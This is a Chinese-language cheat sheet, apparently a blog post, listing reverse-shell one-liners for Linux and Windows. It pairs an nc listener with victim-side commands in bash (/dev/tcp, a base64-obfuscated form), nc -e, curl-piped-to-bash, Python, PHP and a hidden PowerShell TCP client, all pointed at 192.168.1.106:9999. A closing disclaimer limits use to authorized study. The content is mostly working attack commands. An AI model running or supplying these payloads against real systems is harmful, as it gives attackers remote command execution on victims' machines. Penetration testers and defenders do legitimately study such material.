常见反弹shell
linux反弹shell
payload生成器:https://www.revshells.com/
bash反弹
# 攻击机
nc -lvnp 9999
# 受害机
bash -i >& /dev/tcp/192.168.1.106/9999 0>&1
# 其他利用方式
# 命令执行
bash -c 'bash -i >& /dev/tcp/192.168.1.106/9999 0>&1'
# base64加密
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTA2Lzk5OTkgMD4mMQ==" | base64 -d | bash
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTA2Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}'
nc反弹
# 攻击机
nc -lvnp 9999
# 受害机
nc 192.168.1.106 9999 -e bash
-e:创建连接后执行的程序
curl反弹
# 攻击机,开启apache服务
echo "bash -c 'bash -i >& /dev/tcp/192.168.1.106/9999 0>&1'" > shell.html
nc -lvnp 9999
# 受害机
curl 192.168.1.106/shell.html|bash
python反弹
# 攻击机
nc -lvnp 9999
# 受害机
# python2
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.106",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
# python3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.106",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
php反弹
# 攻击机
nc -lvnp 9999
# 受害机
php -r '$sock=fsockopen("192.168.1.106",9999);`bash <&3 >&3 2>&3`;'
windows反弹shell
powershell反弹
# 攻击机
nc -lvnp 9999
# 受害机
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.1.106",9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
nc反弹
# 攻击机
nc -lvnp 9999
# 受害机
nc 192.168.1.106 9999 -e c:\windows\system32\cmd.exe
本文作者:Cx330Lm
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
安全声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步